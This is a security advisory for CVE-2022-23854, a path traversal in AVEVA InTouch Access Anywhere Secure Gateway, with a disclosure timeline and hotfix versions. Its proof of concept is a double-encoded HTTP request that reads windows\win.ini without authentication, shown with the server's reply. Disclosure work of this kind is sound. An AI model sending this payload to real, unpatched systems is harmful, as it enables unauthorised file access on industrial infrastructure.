InTouch Access Anywhere Secure Gateway 2020 R2 Path Traversal

Title:======AVEVA InTouch Access Anywhere Secure Gateway - Path TraversalAuthor:=======Jens Regel, CRISEC IT-SecurityCVE:====CVE-2022-23854Advisory:=========https://crisec.de/advisory-aveva-intouch-access-anywhere-secure-gateway-path-traversal/Timeline:=========25.06.2021 Vulnerability discovered25.06.2021 Send details to [email protected] Vendor response, fix is available until Q1/202225.09.2021 Vendor released Tech Alert TA00002233506.09.2022 Public disclosureVendor:=======AVEVA Group plc is a marine and plant engineering IT company headquartered in Cambridge, England. AVEVA software is used in many sectors, including on- and off-shore oil and gas processing, chemicals, pharmaceuticals, nuclear and conventional power generation, nuclear fuel reprocessing, recycling and shipbuilding (https://www.aveva.com).Affected Products:==================InTouch Access Anywhere Secure Gateway versions 2020 R2 and olderDetails:========A security vulnerability exists in InTouch Access Anywhere Secure Gateway versions 2020 R2 and older. This is a Relative Path Traversal vulnerability which allows an unauthenticated user with network access to the Secure Gateway to read files on the system outside of the Secure Gateway web server.Proof of Concept:=================GET /AccessAnywhere/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows%255cwin.ini HTTP/1.1HTTP/1.1 200 OKServer: EricomSecureGateway/8.4.0.26844.*(..); for 16-bit app support[fonts][extensions][mci extensions][files][Mail]MAPI=1Fix:====InTouch Access Anywhere Secure Gateway 2020 R2 (version 20.1.0) HotfixInTouch Access Anywhere Secure Gateway 2020b (version 20.0.1) Hotfix